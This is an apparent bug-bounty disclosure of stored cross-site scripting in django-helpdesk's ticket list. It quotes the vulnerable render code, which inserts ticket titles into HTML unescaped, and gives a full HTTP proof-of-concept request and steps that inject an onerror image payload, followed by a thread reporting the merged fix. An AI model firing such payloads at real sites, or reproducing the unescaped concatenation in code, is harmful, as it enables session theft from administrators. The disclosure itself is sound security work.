Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk
Valid
Reported on
Nov 3rd 2021
Description
Stored XSS via parameter [title] when create new ticket
Details
At the table tickets in admin, when rendering data for column [Ticket] it allows for arbitrary execution of JavaScript
Vulnerability code
{
data: "ticket",
render: function (data, type, row, meta) {
if (type === 'display') {
data = '<div class="tickettitle"><a href="' + get_url(row) + '" >' +
row.id + '. ' +
row.title + '</a></div>';
}
return data
}
},
Render with [title] contain payload
<td><div class="tickettitle"><a href="/tickets/57832/">57832. "><img src="x" onerror="alert(1);"></a></div></td>
Proof of Concept
// PoC.req
POST /tickets/submit/ HTTP/1.1
Host: django-helpdesk-demo.herokuapp.com
Cookie: csrftoken=5xfltA7UxP3sMJG5OHKCAlHRzR9mrrUbXWfwOrJJl6JhC3OszzsZBcFMEmbCsIeh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-helpdesk-demo.herokuapp.com/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------35329910622610784793670383726
Content-Length: 1150
Origin: https://django-helpdesk-demo.herokuapp.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="csrfmiddlewaretoken"
Sn6i713aQfmhgW3ET6Q39tRXE3yt0kePKM6tsSFZEw266gb1EYyqakPSJyAJ1ByV
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="queue"
1
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="title"
"><iMg SrC="x" oNeRRor="alert(1);">
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="body"
test
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="priority"
3
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="due_date"
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="submitter_email"
test@example.com
-----------------------------35329910622610784793670383726--
Step to Reproduct
Goto URL without login to create a new ticket: https://django-helpdesk-demo.herokuapp.com/tickets/submit/
At field [Summary of the problem] input with payload: "><iMg SrC="x" oNeRRor="alert(1);">
The XSS will trigger when the admin load all tickets
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
Occurrences
References
We are processing your report and will contact the
django-helpdesk
team within 24 hours.
2 years ago
lethanhphuc modified the report
2 years ago
We have contacted a member of the
django-helpdesk
team and are waiting to hear back
2 years ago
We have sent a
follow up to the
django-helpdesk
team.
We will try again in 7 days.
2 years ago
2 years ago
PR: https://github.com/django-helpdesk/django-helpdesk/pull/980
fix has been merged and will be released in next bugfix release. thanks!
ticket_list.html#L369
has been validated
to join this conversation